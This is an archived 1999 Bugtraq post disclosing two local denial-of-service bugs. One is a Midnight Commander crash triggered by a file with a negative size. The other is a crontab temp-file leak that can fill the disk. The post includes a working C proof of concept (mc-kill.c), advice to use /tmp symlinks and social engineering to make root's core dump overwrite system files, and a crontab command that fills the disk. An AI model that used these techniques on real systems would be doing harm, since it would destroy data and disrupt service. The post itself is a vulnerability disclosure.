[10231] in bugtraq
Large size file and Midnight/bug in crontab with this file
daemon@ATHENA.MIT.EDU (Maurycy Prodeus)
Thu Apr 15 13:24:47 1999
Date: Thu, 15 Apr 1999 06:16:08 -0000
Reply-To: z33d@LIGHTING.ML.ORG
From: Maurycy Prodeus <z33d@LIGHTING.ML.ORG>
To: BUGTRAQ@NETSPACE.ORG
Hello ...
*******************************************************************************
*
* I. -= Midnight small buf =-
*
* II. -= Large size file - you can fill disk too with crontab ( Michal
* Zalewski found this )
*
*******************************************************************************
I.
This time I found another bug in Midnight Commander 4.xx [ i used 4.1.33 ;)] ...
We can make a Segmentation Fault and if root doesn't lock this , it causes
Core Dumping ... ofcourse we just make some file in /tmp (?) and if root
read this file ... his mc creates core... yeesss we can make symlink to
every file in system ... and this file will be total destroy !
Together with "Social Engeering",it is dangerous . [ filename may be example :
hacker.tools or sth. ]
What file we must create ?
With negative size , but really it is a very large size ;-) ( very strange
that even in kernel 2.2.5 it is posible )
Quick test : Run this program and next run mc and try read [ F3 ofcourse
and example PageDown ] file which was created by mc-kill ...
--------- mc-kill.c ------------
#include <sys/file.h>
#include <stdio.h>
#define size -900000
main(int argc,char* argv[]) {
int i;
if (!argv[1]) {
printf("\nUSAGE : %s filename[and patch] \n\n",argv[0]);
exit(0);
}
fchmod(i=open(argv[1],O_RDWR|O_CREAT,0600),0666);
ftruncate(i,size);
fsync(i);
}
------------ end of mc-kill.c ---------------
SOLUTION
You NEVER read strange file in MC ...:-)
hmmm seriously : lcamtuf [ http://dione.ids.pl ] wrote kernel module which
not allow to create symlinks in /tmp ...
II.
If you use above program ( or /dev/zero :-) ) you may fill partition ...
When crontab is reading file , creates temp in /var/spool/cron/ ( non-root
can't even read this - lcamtuf ) But , if it doesn't finish then doesn't
delete
this temp file ... OK. So , we must give crontab file with "infinit" size
.
Example : crontab -file-made-by-mc-kill
SOLUTION
It isn't very dangerous.
*******************************************************************************
z33d email : z33d@lighting.ml.org www : z33d.lighting.ml.org
Jesli nie istnieje racjonalna strategia optymalna , optymalna strategia
jest strategia losowa ...
- unknown -
